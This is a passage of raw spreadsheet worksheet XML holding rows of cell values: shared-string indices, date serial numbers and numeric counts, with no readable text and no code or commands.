        <v>77</v>
      </c>
      <c r="M103" t="s">
        <v>475</v>
      </c>
      <c r="N103" t="s">
        <v>476</v>
      </c>
      <c r="O103" t="s">
        <v>490</v>
      </c>
      <c r="Q103" t="s">
        <v>478</v>
      </c>
      <c r="W103" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="104" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A104" t="s">
        <v>3</v>
      </c>
      <c r="B104">
        <v>43523.64292027778</v>
      </c>
      <c r="C104" t="s">
        <v>468</v>
      </c>
      <c r="D104">
        <v>301</v>
      </c>
      <c r="E104" t="s">
        <v>491</v>
      </c>
      <c r="F104">
        <v>101</v>
      </c>
      <c r="G104" t="s">
        <v>492</v>
      </c>
      <c r="H104" t="s">
        <v>493</v>
      </c>
      <c r="I104" t="s">
        <v>156</v>
      </c>
      <c r="J104" t="s">
        <v>301</v>
      </c>
      <c r="K104" t="s">
        <v>26</v>
      </c>
      <c r="L104" t="s">
        <v>77</v>
      </c>
      <c r="M104" t="s">
        <v>475</v>
      </c>
      <c r="N104" t="s">
        <v>476</v>
      </c>
      <c r="O104" t="s">
        <v>477</v>
      </c>
      <c r="Q104" t="s">
        <v>478</v>
      </c>
      <c r="W104" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="105" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A105" t="s">
        <v>3</v>
      </c>
      <c r="B105">
        <v>44048.487136076386</v>
      </c>
      <c r="C105" t="s">
        <v>1231</v>
      </c>
      <c r="D105">
        <v>101</v>
      </c>
      <c r="E105" t="s">
        <v>1232</v>
      </c>
      <c r="F105">
        <v>101</v>
      </c>
      <c r="G105" t="s">
        <v>1233</v>
      </c>
      <c r="H105" t="s">
        <v>1234</v>
      </c>
      <c r="I105" t="s">
        <v>172</v>
      </c>
      <c r="J105" t="s">
        <v>173</v>
      </c>
      <c r="K105" t="s">
        <v>13</v>
      </c>
      <c r="L105" t="s">
        <v>83</v>
      </c>
      <c r="M105" t="s">
        <v>72</v>
      </c>
      <c r="O105" t="s">
        <v>1235</v>
      </c>
      <c r="P105" t="s">
        <v>951</v>
      </c>
      <c r="Q105" t="s">
        <v>3654</v>
      </c>
      <c r="R105">
        <v>26258</v>
      </c>
      <c r="S105">
        <v>18066</v>
      </c>
      <c r="T105">
        <v>117011</v>
      </c>
      <c r="U105">
        <v>183486</v>
      </c>
      <c r="V105">
        <v>177912</v>
      </c>
      <c r="W105" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="106" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A106" t="s">
        <v>3</v>
      </c>
      <c r="B106">
        <v>44070.571136736115</v>
      </c>
      <c r="C106" t="s">
        <v>1417</v>
      </c>
      <c r="D106">
        <v>100</v>
      </c>
      <c r="E106" t="s">
        <v>1418</v>
      </c>
      <c r="F106">
        <v>100</v>
      </c>
      <c r="G106" t="s">
        <v>1419</v>
      </c>
      <c r="H106" t="s">
        <v>1420</v>
      </c>
      <c r="I106" t="s">
        <v>17</v>
      </c>
      <c r="J106" t="s">
        <v>1412</v>
      </c>
      <c r="K106" t="s">
        <v>36</v>
      </c>
      <c r="L106" t="s">
        <v>83</v>
      </c>
      <c r="M106" t="s">
        <v>72</v>
      </c>
      <c r="Q106" t="s">
        <v>3655</v>
      </c>
      <c r="T106">
        <v>1748</v>
      </c>
      <c r="U106">
        <v>2877</v>
      </c>
      <c r="V106">
        <v>4520</v>
      </c>
      <c r="W106" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="107" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A107" t="s">
        <v>3</v>
      </c>
      <c r="B107">
        <v>43971.465269837965</v>
      </c>
      <c r="C107" t="s">
        <v>1733</v>
      </c>
      <c r="D107">
        <v>101</v>
      </c>
      <c r="E107" t="s">
        <v>1734</v>
      </c>
      <c r="F107">
        <v>101</v>
      </c>
      <c r="G107" t="s">
        <v>1735</v>
      </c>
      <c r="H107" t="s">
        <v>1736</v>
      </c>
      <c r="I107" t="s">
        <v>31</v>
      </c>
      <c r="J107" t="s">
        <v>262</v>
      </c>
      <c r="K107" t="s">
        <v>31</v>
      </c>
      <c r="L107" t="s">
        <v>77</v>
      </c>
      <c r="M107" t="s">
        <v>262</v>
      </c>
      <c r="N107" t="s">
        <v>263</v>
      </c>
      <c r="Q107" t="s">
        <v>3656</v>
      </c>
      <c r="W107" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="108" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A108" t="s">
        <v>3</v>
      </c>
      <c r="B108">
        <v>43984.924520972221</v>
      </c>
      <c r="C108" t="s">
        <v>1769</v>
      </c>
      <c r="D108">
        <v>102</v>
      </c>
      <c r="E108" t="s">
        <v>1775</v>
      </c>
      <c r="F108">
        <v>102</v>
      </c>
      <c r="G108" t="s">
        <v>1776</v>
      </c>
      <c r="H108" t="s">
        <v>1777</v>
      </c>
      <c r="I108" t="s">
        <v>82</v>
      </c>
      <c r="J108" t="s">
        <v>744</v>
      </c>
      <c r="K108" t="s">
        <v>24</v>
      </c>
      <c r="L108" t="s">
        <v>83</v>
      </c>
      <c r="M108" t="s">
        <v>72</v>
      </c>
      <c r="O108" t="s">
        <v>1778</v>
      </c>
      <c r="P108" t="s">
        <v>745</v>
      </c>
      <c r="Q108" t="s">
        <v>3657</v>
      </c>
      <c r="R108">
        <v>383</v>
      </c>
      <c r="S108">
        <v>213</v>
      </c>
      <c r="T108">
        <v>1430</v>
      </c>
      <c r="U108">
        <v>2558</v>
      </c>
      <c r="V108">
        <v>3151</v>
      </c>
      <c r="W108" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="109" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A109" t="s">
        <v>3</v>
      </c>
      <c r="B109">
        <v>44041.707096238424</v>
      </c>
      <c r="C109" t="s">
        <v>2072</v>
      </c>
      <c r="D109">
        <v>101</v>
      </c>
      <c r="E109" t="s">
        <v>2073</v>
      </c>
      <c r="F109">
        <v>101</v>
      </c>
      <c r="G109" t="s">
        <v>2074</v>
      </c>
      <c r="H109" t="s">
        <v>146</v>
      </c>
      <c r="I109" t="s">
        <v>103</v>
      </c>
      <c r="J109" t="s">
        <v>147</v>
      </c>
      <c r="K109" t="s">
        <v>35</v>
      </c>
      <c r="L109" t="s">
        <v>83</v>
      </c>
      <c r="M109" t="s">
        <v>148</v>
      </c>
      <c r="N109" t="s">
        <v>149</v>
      </c>
      <c r="O109" t="s">
        <v>150</v>
      </c>
      <c r="Q109" t="s">
        <v>151</v>
      </c>
      <c r="R109">
        <v>108</v>
      </c>
      <c r="S109">
        <v>33</v>
      </c>
      <c r="W109" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="110" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A110" t="s">
        <v>3</v>
      </c>
      <c r="B110">
        <v>44200.399547685185</v>
      </c>
      <c r="C110" t="s">
        <v>2309</v>
      </c>
      <c r="D110">
        <v>110</v>
      </c>
      <c r="E110" t="s">
        <v>2310</v>
      </c>
      <c r="F110">
        <v>110</v>
      </c>
      <c r="G110" t="s">
        <v>2311</v>
      </c>
      <c r="H110" t="s">
        <v>2296</v>
      </c>
      <c r="I110" t="s">
        <v>203</v>
      </c>
      <c r="J110" t="s">
        <v>204</v>
      </c>
      <c r="K110" t="s">
        <v>24</v>
      </c>
      <c r="L110" t="s">
        <v>83</v>
      </c>
      <c r="M110" t="s">
        <v>72</v>
      </c>
      <c r="Q110" t="s">
        <v>2312</v>
      </c>
      <c r="R110">
        <v>8</v>
      </c>
      <c r="S110">
        <v>1</v>
      </c>
      <c r="T110">
        <v>11</v>
      </c>
      <c r="U110">
        <v>11</v>
      </c>
      <c r="V110">
        <v>42</v>
      </c>
      <c r="W110" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="111" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A111" t="s">
        <v>3</v>
      </c>
      <c r="B111">
        <v>43971.46526986111</v>
      </c>
      <c r="C111" t="s">
        <v>1733</v>
      </c>
      <c r="D111">
        <v>101</v>
      </c>
      <c r="E111" t="s">
        <v>2392</v>
      </c>
      <c r="F111">
        <v>101</v>
      </c>
      <c r="G111" t="s">
        <v>2393</v>
      </c>
      <c r="H111" t="s">
        <v>2394</v>
      </c>
      <c r="I111" t="s">
        <v>31</v>
      </c>
      <c r="J111" t="s">
        <v>262</v>
      </c>
      <c r="K111" t="s">
        <v>31</v>
      </c>
      <c r="L111" t="s">
        <v>77</v>
      </c>
      <c r="M111" t="s">
        <v>262</v>
      </c>
      <c r="N111" t="s">
        <v>263</v>
      </c>
      <c r="Q111" t="s">
        <v>3656</v>
      </c>
      <c r="W111" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="112" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A112" t="s">
        <v>3</v>
      </c>
      <c r="B112">
        <v>43840.498662662038</v>
      </c>
      <c r="C112" t="s">
        <v>2574</v>
      </c>
      <c r="D112">
        <v>101</v>
      </c>
      <c r="E112" t="s">
        <v>2575</v>
      </c>
      <c r="F112">
        <v>101</v>
      </c>
      <c r="G112" t="s">
        <v>2576</v>
      </c>
      <c r="H112" t="s">
        <v>2577</v>
      </c>
      <c r="I112" t="s">
        <v>179</v>
      </c>
      <c r="J112" t="s">
        <v>180</v>
      </c>
      <c r="K112" t="s">
        <v>19</v>
      </c>
      <c r="L112" t="s">
        <v>77</v>
      </c>
      <c r="O112" t="s">
        <v>2578</v>
      </c>
      <c r="P112" t="s">
        <v>181</v>
      </c>
      <c r="Q112" t="s">
        <v>3658</v>
      </c>
      <c r="R112">
        <v>11</v>
      </c>
      <c r="S112">
        <v>8</v>
      </c>
      <c r="T112">
        <v>43</v>
      </c>
      <c r="U112">
        <v>73</v>
      </c>
      <c r="V112">
        <v>56</v>
      </c>
      <c r="W112" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="113" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A113" t="s">
        <v>3</v>
      </c>
      <c r="B113">
        <v>43985.648306261573</v>
      </c>
      <c r="C113" t="s">
        <v>2744</v>
      </c>
      <c r="D113">
        <v>124</v>
      </c>
      <c r="E113" t="s">
        <v>2745</v>
      </c>
      <c r="F113">
        <v>104</v>
      </c>
      <c r="G113" t="s">
        <v>2746</v>
      </c>
      <c r="H113" t="s">
        <v>2747</v>
      </c>
      <c r="I113" t="s">
        <v>103</v>
      </c>
      <c r="J113" t="s">
        <v>147</v>
      </c>
      <c r="K113" t="s">
        <v>35</v>
      </c>
      <c r="L113" t="s">
        <v>83</v>
      </c>
      <c r="M113" t="s">
        <v>148</v>
      </c>
      <c r="N113" t="s">
        <v>149</v>
      </c>
      <c r="P113" t="s">
        <v>2748</v>
      </c>
      <c r="Q113" t="s">
        <v>3659</v>
      </c>
      <c r="R113">
        <v>178</v>
      </c>
      <c r="S113">
        <v>181</v>
      </c>
      <c r="T113">
        <v>1721</v>
      </c>
      <c r="U113">
        <v>3182</v>
      </c>
      <c r="V113">
        <v>4031</v>
      </c>
      <c r="W113" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="114" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A114" t="s">
        <v>3</v>
      </c>
      <c r="B114">
        <v>43908.853579537034</v>
      </c>
      <c r="C114" t="s">
        <v>2744</v>
      </c>
      <c r="D114">
        <v>124</v>
      </c>
      <c r="E114" t="s">
        <v>2750</v>
      </c>
      <c r="F114">
        <v>102</v>
      </c>
      <c r="G114" t="s">
        <v>2751</v>
      </c>
      <c r="H114" t="s">
        <v>2752</v>
      </c>
      <c r="I114" t="s">
        <v>103</v>
      </c>
      <c r="J114" t="s">
        <v>147</v>
      </c>
      <c r="K114" t="s">
        <v>35</v>
      </c>
      <c r="L114" t="s">
        <v>83</v>
      </c>
      <c r="M114" t="s">
        <v>148</v>
      </c>
      <c r="N114" t="s">
        <v>149</v>
      </c>
      <c r="P114" t="s">
        <v>2748</v>
      </c>
      <c r="Q114" t="s">
        <v>3659</v>
      </c>
      <c r="R114">
        <v>3</v>
      </c>
      <c r="S114">
        <v>8</v>
      </c>
      <c r="T114">
        <v>899</v>
      </c>
      <c r="U114">
        <v>1514</v>
      </c>
      <c r="V114">
        <v>2345</v>
      </c>
      <c r="W114" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="115" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A115" t="s">
        <v>3</v>
      </c>
      <c r="B115">
        <v>43908.853579606483</v>
      </c>
      <c r="C115" t="s">
        <v>2744</v>
      </c>
      <c r="D115">
        <v>124</v>
      </c>
      <c r="E115" t="s">
        <v>2753</v>
      </c>
      <c r="F115">
        <v>102</v>
      </c>
      <c r="G115" t="s">
        <v>2754</v>
      </c>
      <c r="H115" t="s">
        <v>2755</v>
      </c>
      <c r="I115" t="s">
        <v>103</v>
      </c>
      <c r="J115" t="s">
        <v>147</v>
      </c>
      <c r="K115" t="s">
        <v>35</v>
      </c>
      <c r="L115" t="s">
        <v>83</v>
      </c>
      <c r="M115" t="s">
        <v>148</v>
      </c>
      <c r="N115" t="s">
        <v>149</v>
      </c>
      <c r="P115" t="s">
        <v>2748</v>
      </c>
      <c r="Q115" t="s">
        <v>3659</v>
      </c>
      <c r="R115">
        <v>3</v>
      </c>
      <c r="T115">
        <v>874</v>
      </c>
      <c r="U115">
        <v>1440</v>
      </c>
      <c r="V115">
        <v>2305</v>
      </c>
      <c r="W115" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="116" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A116" t="s">
        <v>3</v>
      </c>
      <c r="B116">
        <v>43889.707511701388</v>
      </c>
      <c r="C116" t="s">
        <v>2744</v>
      </c>
      <c r="D116">
        <v>124</v>
      </c>
      <c r="E116" t="s">
        <v>2756</v>
      </c>
      <c r="F116">
        <v>102</v>
      </c>
      <c r="G116" t="s">
        <v>2757</v>
      </c>
      <c r="H116" t="s">
        <v>2758</v>
      </c>
      <c r="I116" t="s">
        <v>103</v>
      </c>
      <c r="J116" t="s">
        <v>147</v>
      </c>
      <c r="K116" t="s">
        <v>35</v>
      </c>
      <c r="L116" t="s">
        <v>83</v>
      </c>
      <c r="M116" t="s">
        <v>148</v>
      </c>
      <c r="N116" t="s">
        <v>149</v>
      </c>
      <c r="P116" t="s">
        <v>2748</v>
      </c>
      <c r="Q116" t="s">
        <v>3659</v>
      </c>
      <c r="R116">
        <v>3</v>
      </c>
      <c r="S116">
        <v>1</v>
      </c>
      <c r="T116">
        <v>886</v>
      </c>
      <c r="U116">
        <v>1457</v>
      </c>
      <c r="V116">
        <v>1519</v>
      </c>
      <c r="W116" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="117" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A117" t="s">
        <v>3</v>
      </c>
      <c r="B117">
        <v>43908.853579629627</v>
      </c>
      <c r="C117" t="s">
        <v>2744</v>
      </c>
      <c r="D117">
        <v>124</v>
      </c>
      <c r="E117" t="s">
        <v>2759</v>
      </c>
      <c r="F117">
        <v>102</v>
      </c>
      <c r="G117" t="s">
        <v>2760</v>
      </c>
      <c r="H117" t="s">
        <v>2761</v>
      </c>
      <c r="I117" t="s">
        <v>103</v>
      </c>
      <c r="J117" t="s">
        <v>147</v>
      </c>
      <c r="K117" t="s">
        <v>35</v>
      </c>
      <c r="L117" t="s">
        <v>83</v>
      </c>
      <c r="M117" t="s">
        <v>148</v>
      </c>
      <c r="N117" t="s">
        <v>149</v>
      </c>
      <c r="P117" t="s">
        <v>2748</v>
      </c>
      <c r="Q117" t="s">
        <v>3659</v>
      </c>
      <c r="R117">
        <v>49</v>
      </c>
      <c r="S117">
        <v>62</v>
      </c>
      <c r="T117">
        <v>1144</v>
      </c>
      <c r="U117">
        <v>2098</v>
      </c>
      <c r="V117">
        <v>2827</v>
      </c>
      <c r="W117" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="118" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A118" t="s">
        <v>3</v>
      </c>
      <c r="B118">
        <v>43908.853579479168</v>
      </c>
      <c r="C118" t="s">
        <v>2744</v>
      </c>
      <c r="D118">
        <v>124</v>
      </c>
      <c r="E118" t="s">
        <v>2762</v>
      </c>
      <c r="F118">
        <v>103</v>
      </c>
      <c r="G118" t="s">
        <v>2763</v>
      </c>
      <c r="H118" t="s">
        <v>2764</v>
      </c>
      <c r="I118" t="s">
        <v>103</v>
      </c>
      <c r="J118" t="s">
        <v>147</v>
      </c>
      <c r="K118" t="s">
        <v>35</v>
      </c>
      <c r="L118" t="s">
        <v>83</v>
      </c>
      <c r="M118" t="s">
        <v>148</v>
      </c>
      <c r="N118" t="s">
        <v>149</v>
      </c>
      <c r="P118" t="s">
        <v>2748</v>
      </c>
      <c r="Q118" t="s">
        <v>3659</v>
      </c>
      <c r="R118">
        <v>29</v>
      </c>
      <c r="S118">
        <v>21</v>
      </c>
      <c r="T118">
        <v>1002</v>
      </c>
      <c r="U118">
        <v>1787</v>
      </c>
      <c r="V118">
        <v>2531</v>
      </c>
      <c r="W118" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="119" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A119" t="s">
        <v>3</v>
      </c>
      <c r="B119">
        <v>43889.707511782406</v>
      </c>
      <c r="C119" t="s">
        <v>2744</v>
      </c>
      <c r="D119">
        <v>124</v>
      </c>
      <c r="E119" t="s">
        <v>2765</v>
      </c>
      <c r="F119">
        <v>101</v>
      </c>
      <c r="G119" t="s">
        <v>2766</v>
      </c>
      <c r="H119" t="s">
        <v>2767</v>
      </c>
      <c r="I119" t="s">
        <v>103</v>
      </c>
      <c r="J119" t="s">
        <v>147</v>
      </c>
      <c r="K119" t="s">
        <v>35</v>
      </c>
      <c r="L119" t="s">
        <v>83</v>
      </c>
      <c r="M119" t="s">
        <v>148</v>
      </c>
      <c r="N119" t="s">
        <v>149</v>
      </c>
      <c r="P119" t="s">
        <v>2748</v>
      </c>
      <c r="Q119" t="s">
        <v>3659</v>
      </c>
      <c r="R119">
        <v>7</v>
      </c>
      <c r="S119">
        <v>8</v>
      </c>
      <c r="T119">
        <v>932</v>
      </c>
      <c r="U119">
        <v>1490</v>
      </c>
      <c r="V119">
        <v>2344</v>
      </c>
      <c r="W119" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="120" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A120" t="s">
        <v>3</v>
      </c>
      <c r="B120">
        <v>43908.853579571762</v>
      </c>
      <c r="C120" t="s">
        <v>2744</v>
      </c>
      <c r="D120">
        <v>124</v>
      </c>
      <c r="E120" t="s">
        <v>2768</v>
      </c>
      <c r="F120">
        <v>102</v>
      </c>
      <c r="G120" t="s">
        <v>2769</v>
      </c>
      <c r="H120" t="s">
        <v>2770</v>
      </c>
      <c r="I120" t="s">
        <v>103</v>
      </c>
      <c r="J120" t="s">
        <v>147</v>
      </c>
      <c r="K120" t="s">
        <v>35</v>
      </c>
      <c r="L120" t="s">
        <v>83</v>
      </c>
      <c r="M120" t="s">
        <v>148</v>
      </c>
      <c r="N120" t="s">
        <v>149</v>
      </c>
      <c r="P120" t="s">
        <v>2748</v>
      </c>
      <c r="Q120" t="s">
        <v>3659</v>
      </c>
      <c r="R120">
        <v>12</v>
      </c>
      <c r="S120">
        <v>34</v>
      </c>
      <c r="T120">
        <v>917</v>
      </c>
      <c r="U120">
        <v>1633</v>
      </c>
      <c r="V120">
        <v>2474</v>
      </c>
      <c r="W120" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="121" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A121" t="s">
        <v>3</v>
      </c>
      <c r="B121">
        <v>43889.707511875</v>
      </c>
      <c r="C121" t="s">
        <v>2744</v>
      </c>
      <c r="D121">
        <v>124</v>
      </c>
      <c r="E121" t="s">
        <v>2771</v>
      </c>
      <c r="F121">
        <v>101</v>
      </c>
      <c r="G121" t="s">
        <v>2772</v>
      </c>
      <c r="H121" t="s">
        <v>2773</v>
      </c>
      <c r="I121" t="s">
        <v>103</v>
      </c>
      <c r="J121" t="s">
        <v>147</v>
      </c>
      <c r="K121" t="s">
        <v>35</v>
      </c>
      <c r="L121" t="s">
        <v>83</v>
      </c>
      <c r="M121" t="s">
        <v>148</v>
      </c>
      <c r="N121" t="s">
        <v>149</v>
      </c>
      <c r="P121" t="s">
        <v>2748</v>
      </c>
      <c r="Q121" t="s">
        <v>3659</v>
      </c>
      <c r="S121">
        <v>4</v>
      </c>
      <c r="T121">
        <v>880</v>
      </c>
      <c r="U121">
        <v>1444</v>
      </c>
      <c r="V121">
        <v>1509</v>
      </c>
      <c r="W121" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="122" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A122" t="s">
        <v>3</v>
      </c>
      <c r="B122">
        <v>43889.707511840279</v>
      </c>
      <c r="C122" t="s">
        <v>2744</v>
      </c>
      <c r="D122">
        <v>124</v>
      </c>
      <c r="E122" t="s">
        <v>2774</v>
      </c>
      <c r="F122">
        <v>101</v>
      </c>
      <c r="G122" t="s">
        <v>2775</v>
      </c>
      <c r="H122" t="s">
        <v>2776</v>
      </c>
      <c r="I122" t="s">
        <v>103</v>
      </c>
      <c r="J122" t="s">
        <v>147</v>
      </c>
      <c r="K122" t="s">
        <v>35</v>
      </c>
      <c r="L122" t="s">
        <v>83</v>
      </c>
      <c r="M122" t="s">
        <v>148</v>
      </c>
      <c r="N122" t="s">
        <v>149</v>
      </c>
      <c r="P122" t="s">
        <v>2748</v>
      </c>
      <c r="Q122" t="s">
        <v>3659</v>
      </c>
      <c r="R122">
        <v>43</v>
      </c>
      <c r="S122">
        <v>112</v>
      </c>
      <c r="T122">
        <v>1165</v>
      </c>
      <c r="U122">
        <v>2296</v>
      </c>
      <c r="V122">
        <v>3012</v>
      </c>
      <c r="W122" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="123" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A123" t="s">
        <v>3</v>
      </c>
      <c r="B123">
        <v>43908.853579502313</v>
      </c>
      <c r="C123" t="s">
        <v>2744</v>
      </c>
      <c r="D123">
        <v>124</v>
      </c>
      <c r="E123" t="s">
        <v>2777</v>
      </c>
      <c r="F123">
        <v>102</v>
      </c>
      <c r="G123" t="s">
        <v>2778</v>
      </c>
      <c r="H123" t="s">
        <v>2779</v>
      </c>
      <c r="I123" t="s">
        <v>103</v>
      </c>
      <c r="J123" t="s">
        <v>147</v>
      </c>
      <c r="K123" t="s">
        <v>35</v>
      </c>
      <c r="L123" t="s">
        <v>83</v>
      </c>
      <c r="M123" t="s">
        <v>148</v>
      </c>
      <c r="N123" t="s">
        <v>149</v>
      </c>
      <c r="P123" t="s">
        <v>2748</v>
      </c>
      <c r="Q123" t="s">
        <v>3659</v>
      </c>
      <c r="T123">
        <v>872</v>
      </c>
      <c r="U123">
        <v>1440</v>
      </c>
      <c r="V123">
        <v>2298</v>
      </c>
      <c r="W123" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="124" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A124" t="s">
        <v>3</v>
      </c>
      <c r="B124">
        <v>44065.723533958335</v>
      </c>
      <c r="C124" t="s">
        <v>2780</v>
      </c>
      <c r="D124">
        <v>132</v>
      </c>
      <c r="E124" t="s">
        <v>2781</v>
      </c>
      <c r="F124">
        <v>120</v>
      </c>
      <c r="G124" t="s">
        <v>2782</v>
      </c>
      <c r="H124" t="s">
        <v>2783</v>
      </c>
      <c r="I124" t="s">
        <v>17</v>
      </c>
      <c r="J124" t="s">
        <v>1412</v>
      </c>
      <c r="K124" t="s">
        <v>17</v>
      </c>
      <c r="L124" t="s">
        <v>83</v>
      </c>
      <c r="M124" t="s">
        <v>72</v>
      </c>
      <c r="Q124" t="s">
        <v>3660</v>
      </c>
      <c r="W124" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="125" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A125" t="s">
        <v>3</v>
      </c>
      <c r="B125">
        <v>44065.723533912038</v>
      </c>
      <c r="C125" t="s">
        <v>2780</v>
      </c>
      <c r="D125">
        <v>132</v>
      </c>
      <c r="E125" t="s">
        <v>2792</v>
      </c>
      <c r="F125">
        <v>110</v>
      </c>
      <c r="G125" t="s">
        <v>2793</v>
      </c>
      <c r="H125" t="s">
        <v>2783</v>
      </c>
      <c r="I125" t="s">
        <v>17</v>
      </c>
      <c r="J125" t="s">
        <v>1412</v>
      </c>
      <c r="K125" t="s">
        <v>17</v>
      </c>
      <c r="L125" t="s">
        <v>83</v>
      </c>
      <c r="M125" t="s">
        <v>72</v>
      </c>
      <c r="Q125" t="s">
        <v>3660</v>
      </c>
      <c r="W125" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="126" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A126" t="s">
        <v>3</v>
      </c>
      <c r="B126">
        <v>44065.723533888886</v>
      </c>
      <c r="C126" t="s">
        <v>2780</v>
      </c>
      <c r="D126">
        <v>132</v>
      </c>
      <c r="E126" t="s">
        <v>2796</v>
      </c>
      <c r="F126">
        <v>110</v>
      </c>
      <c r="G126" t="s">
        <v>2797</v>
      </c>
      <c r="H126" t="s">
        <v>2798</v>
      </c>
      <c r="I126" t="s">
        <v>17</v>
      </c>
      <c r="J126" t="s">
        <v>1412</v>
      </c>
      <c r="K126" t="s">
        <v>17</v>
      </c>
      <c r="L126" t="s">
        <v>83</v>
      </c>
      <c r="M126" t="s">
        <v>72</v>
      </c>
      <c r="Q126" t="s">
        <v>3660</v>
      </c>
      <c r="W126" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="127" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A127" t="s">
        <v>3</v>
      </c>
      <c r="B127">
        <v>44065.723533842596</v>
      </c>
      <c r="C127" t="s">
        <v>2780</v>
      </c>
      <c r="D127">
        <v>132</v>
      </c>
      <c r="E127" t="s">
        <v>2801</v>
      </c>
      <c r="F127">
        <v>110</v>
      </c>
      <c r="G127" t="s">
        <v>2802</v>
      </c>
      <c r="H127" t="s">
        <v>2783</v>
      </c>
      <c r="I127" t="s">
        <v>17</v>
      </c>
      <c r="J127" t="s">
        <v>1412</v>
      </c>
      <c r="K127" t="s">
        <v>17</v>
      </c>
      <c r="L127" t="s">
        <v>83</v>
      </c>
      <c r="M127" t="s">
        <v>72</v>
      </c>
      <c r="Q127" t="s">
        <v>3660</v>
      </c>
      <c r="R127">
        <v>268</v>
      </c>
      <c r="S127">
        <v>513</v>
      </c>
      <c r="T127">
        <v>5470</v>
      </c>
      <c r="W127" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="128" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A128" t="s">
        <v>3</v>
      </c>
      <c r="B128">
        <v>44065.723533865741</v>
      </c>
      <c r="C128" t="s">
        <v>2780</v>
      </c>
      <c r="D128">
        <v>132</v>
      </c>
      <c r="E128" t="s">
        <v>2805</v>
      </c>
      <c r="F128">
        <v>110</v>
      </c>
      <c r="G128" t="s">
        <v>2806</v>
      </c>
      <c r="H128" t="s">
        <v>2807</v>
      </c>
      <c r="I128" t="s">
        <v>17</v>
      </c>
      <c r="J128" t="s">
        <v>1412</v>
      </c>
      <c r="K128" t="s">
        <v>17</v>
      </c>
      <c r="L128" t="s">
        <v>83</v>
      </c>
      <c r="M128" t="s">
        <v>72</v>
      </c>
      <c r="Q128" t="s">
        <v>3660</v>
      </c>
      <c r="W128" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="129" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A129" t="s">
        <v>3</v>
      </c>
      <c r="B129">
        <v>44065.723533935183</v>
      </c>
      <c r="C129" t="s">
        <v>2780</v>
      </c>
      <c r="D129">
        <v>132</v>
      </c>
      <c r="E129" t="s">
        <v>2812</v>
      </c>
      <c r="F129">
        <v>110</v>
      </c>
      <c r="G129" t="s">
        <v>2813</v>
      </c>
      <c r="H129" t="s">
        <v>2814</v>
      </c>
      <c r="I129" t="s">
        <v>17</v>
      </c>
      <c r="J129" t="s">
        <v>1412</v>
      </c>
      <c r="K129" t="s">
        <v>17</v>
      </c>
      <c r="L129" t="s">
        <v>83</v>
      </c>
      <c r="M129" t="s">
        <v>72</v>
      </c>
      <c r="Q129" t="s">
        <v>3660</v>
      </c>
      <c r="W129" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="130" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A130" t="s">
        <v>3</v>
      </c>
      <c r="B130">
        <v>43971.465269826389</v>
      </c>
      <c r="C130" t="s">
        <v>1733</v>
      </c>
      <c r="D130">
        <v>101</v>
      </c>
      <c r="E130" t="s">
        <v>2848</v>
      </c>
      <c r="F130">
        <v>101</v>
      </c>
      <c r="G130" t="s">
        <v>2849</v>
      </c>
      <c r="H130" t="s">
        <v>2850</v>
      </c>
      <c r="I130" t="s">
        <v>31</v>
      </c>
      <c r="J130" t="s">
        <v>262</v>
      </c>
      <c r="K130" t="s">
        <v>31</v>
      </c>
      <c r="L130" t="s">
        <v>77</v>
      </c>
      <c r="M130" t="s">
        <v>262</v>
      </c>
      <c r="N130" t="s">
        <v>263</v>
      </c>
      <c r="Q130" t="s">
        <v>3656</v>
      </c>
      <c r="W130" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="131" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A131" t="s">
        <v>3</v>
      </c>
      <c r="B131">
        <v>44082.361591076391</v>
      </c>
      <c r="C131" t="s">
        <v>2378</v>
      </c>
      <c r="D131">
        <v>100</v>
      </c>
      <c r="E131" t="s">
        <v>3069</v>
      </c>
      <c r="F131">
